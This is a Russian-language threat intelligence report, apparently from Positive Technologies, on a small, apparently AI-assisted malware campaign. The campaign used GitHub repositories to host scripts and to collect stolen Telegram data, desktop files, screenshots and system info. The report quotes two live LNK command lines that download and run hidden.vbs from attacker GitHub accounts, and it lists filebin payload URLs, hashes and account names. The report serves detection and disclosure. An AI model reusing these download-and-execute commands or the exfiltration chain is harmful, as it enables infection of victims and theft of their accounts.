В процессе исследования вредоносных файлов, которые использовали группировки злоумышленников, мы наткнулись на интересные ранее незамеченные атаки, в которых использовались GitHub-аккаунты для хранения вредоносных файлов и данных жертв. Эти атаки не выглядели как что-то массовое, и, судя по всему, при разработке злоумышленники использовали ИИ. Самую раннюю подобную активность мы зафиксировали в сентябре 2024 года, самую позднюю — в апреле 2025-го.

Мы в команде Threat Intelligence исследуем сложные атаки с интересными способами закрепления и сбора информации, с уникальной инфраструктурой. Бывает, попадаются какие-то простенькие скрипты на пару строчек или же «бомбы», которые запускают сразу десятки различных малварей. Но очень редко мы встречаем настолько длинные цепочки очень простых скриптов, написанных ИИ и при этом рабочих, в такой сложной связке — видно, что логика была продумана. Считайте, это описание APT в иерархии script kiddie.

Начало исследования

Как-то в рамках одной из задач мы наткнулись на интересный файл с двойным расширением, которые сразу привлёк наше внимание:

document.docx.lnk SHA-256: 6bea2d17c26ffc7cec6d6e9c7d8548c5d8ce75e5523bfc7f3bfcde4f055848ff

Нас привлекла команда, которая качала файл hidden.vbs с GitHub, а также запускала легитимный PDF-файл, который скачивался из онлайн-библиотеки Каймановых островов.

/min cmd /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/jacker8181/fff/refs/heads/main/hidden.vbs && cd %TEMP% && start hidden.vbs && start https://cnslibrary.com/wp-content/uploads/2024-2026-SPS.pdf

У пользователя jacker8181, который был указан внутри скрипта, есть два репозитория — fff и tune:

Репозиторий fff содержит два файла:

• hidden.vbs SHA-256: eee0cca526348c2bf393574df418e43ca192671458a4d4d0d5d8d09206ad7757

• unp.bat SHA-256: 2e7bd3ac84f3e4014274ec418f6d0467748b8fcbe858c50bdaf84becf97da023

Файл hidden.vbs уже на этом этапе привлекает внимание стилем кодинга — комментарии под каждой функцией, а также общий вид кода явно были разработаны c помощью запросов к ИИ:

Скрипт скачивал ZIP-архив с filebin.net, а скрипт unp.bat разархивировал этот архив и запускал следующий файл в цепочке — git_v.vbs:

Репозиторий tune содержал папку tdata, связанную с данными Telegram, а также файлы, связанные с системой жертвы, например system_unfo.txt:

В данном случае папка tune хоть и содержала файлы, но при этом они весили по 0 КБ, а по файлам системы невозможно точно идентифицировать жертву. 

Так или иначе, мы начали собирать данные об этих атаках и проанализировали всю цепочку.

Полная цепочка атаки

Мы не смогли обнаружить точный первоначальный вектор, но, судя по всему, атаки начинались с имейлов с вредоносным вложением в виде ZIP- или RAR-архива. Для примера возьмем файл document.zip SHA-256: d83eb2bc85d29d8fe7bcfb1383de3643fcf8f5523ccf02167de1bcc298aa14fd

Цепочки атаки достаточно длинные и запутанные. Представим их визуальную схему:

Архив содержит fille_docu.lnk SHA-256: 08f6cb6d682c9fc9ea895f4bd71ada780a66882aa7330137be6f17fae755eb4a со следующим скриптом:

/min cmd /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/Allsafetui/lex/refs/heads/main/hidden.vbs && cd %TEMP% && start hidden.vbs && start https://career.habr.com/olya-yurievna.pdf"%systemroot%\system32\imageres.dll

Интересно, что атакующий пытался в качестве приманки использовать резюме с career.habr, но в этом случае с огромной долей вероятности PDF-файл по этому пути не мог существовать.

Сам аккаунт на GitHub сейчас не содержит репозиториев:

Файл hidden.vbs загружался с GitHub, но так как сейчас там файлов нет, обнаружить конкретный файл, который был в GitHub аккаунте Allsafetui, невозможно. Но мы нашли два файла, связанных с этим репозиторием:

• hidden.vbs SHA-256: 2b2dc11a9adbc40813b6290a4b117f37ab940c3baebedf19948ba5b7935ab754

• hidden.vbs SHA-256: 658c9f9f6f695c4295db4552326fec1daac621f1fcba63b52ff0c704885f1473

Функциональность у обоих файлов аналогична hidden.vbs, единственные различия — в ссылках на Best_Gits.zip:

• https://filebin.net/jdfcmciyuk0pgsue/Best_Gits.zip

• https://filebin.net/lx7i1oim7otnj5xv/Best_Gits.zip

Файл hidden.vbs качает unp.bat, который разархивирует архив Best_Gits.zip 11d11058d955a03d2fc7270c2968b35867903f4f11b0e23c0aa56655a28df4b8 во временной папке и запускает первый скрипт git_v.vbs:

Сама папка Best_Gits.zip имеет следующую структуру:

Скрипт git_v.vbs запускает в скрытом окне git.cmd:

В свою очередь, git.cmd сразу запускает hidden_runs.vbs, ждет 5 минут, запускает t.vbs, потом опять ждет 10 минут и пушит данные из папки LO в репозиторий GitHub.

Сначала разберемся до команды TIMEOUT: hidden_runs.vbs — прослойка, которая запускает три других скрипта:

1. Первый скрипт — это password_grab.cmd. Скрипт ищет на рабочем столе файлы по имени и сохраняет их в LO/info_desktop. Реализован был, скорее всего, с помощью сложного промпта, типа «создай скрипт, который крадет пароли»: 

   

2. Скрипт screenshot.cmd запускает screen.ps1 в скрытом окне через PowerShell, и screen.ps1 уже собирает данные. Для нашего удобства при создании ИИ уже расписал всю функциональность:

   

   

3.  Третий скрипт, system.bat, также удобно расписан в комментариях. Он собирает информацию о системе и сохраняет ее в system_info.txt:

   

Как было сказано выше, спустя 5 минут после запуска git.cmd запускался t.vbs. Скрипт останавливал процесс Telegram и копировал данные tdata в LO/tdata:

После еще 10 минут ожидания, когда скрипты собрали все данные, с помощью библиотек и модифицированной версии git.exe файлы отправляются в репозиторий https://github.com/Allsafetui с использованием личного access token с отключенным SSL-сертификатом. 

Интересно, что архив также содержал screenshot_hiden.cmd, но этот файл нигде не использовался, а еще был таким же, как обычный screenshot.cmd, только без функции hidden (но называется hidden, да):

Остальные аккаунты

В случае аккаунта jacker8181 мы нашли данные, собранные на компьютере жертвы, но они не содержали какой-то чувствительной информации и, судя по названиям, были результатом прогона в одной из песочниц. При этом мы нашли еще несколько аккаунтов злоумышленников, но большая их часть была удалена. Активным был еще один, который содержал файлы:

Это самый ранний аккаунт, который мы нашли, и, судя по коммитам, он был активен в сентябре 2024 года.

Аккаунт содержал три репозитория:

1) - — содержит файл readme.md с символом -

2) fff — содержит hidden.vbs и unp.bat

3) tet — содержит текстовый файл t.txt

Файл t.txt содержит текст с требованием доставить 50 тысяч долларов в старую библиотеку ночью в пятницу и выглядит совершенно странно в общем контексте: 

Злоумышленник загружал файлы hidden.vbs и unp.bat 16 сентября 2024 года в 16:17:28 с имейлом danatolevic544@gmail.com, а в 16:18:13 с myemail@example.com был загружен файл, который также присутствует в коде git.cmd — вероятно, этот файл тестовый:

Всего было найдено шесть разных аккаунтов, но их количество может быть больше, так как половина уже удалена. В коде во всех случаях создавалась папка с данными и загружалась на GitHub аккаунт, — вероятно, атаки были не массовыми, а таргетированными и проводились по принципу «один аккаунт — одна жертва», если у злоумышленников не была реализована система с уведомлениями при новом коммите и автоматическим забором файлов с дальнейшей очисткой. 

Но судя по аккаунту jacker8181, в котором репозиторий tune до сих пор присутствует, скорее всего, такого механизма не было. 

Александр Бадаев

Cпециалист группы киберразведки TI-департамента экспертного центра безопасности Positive Technologies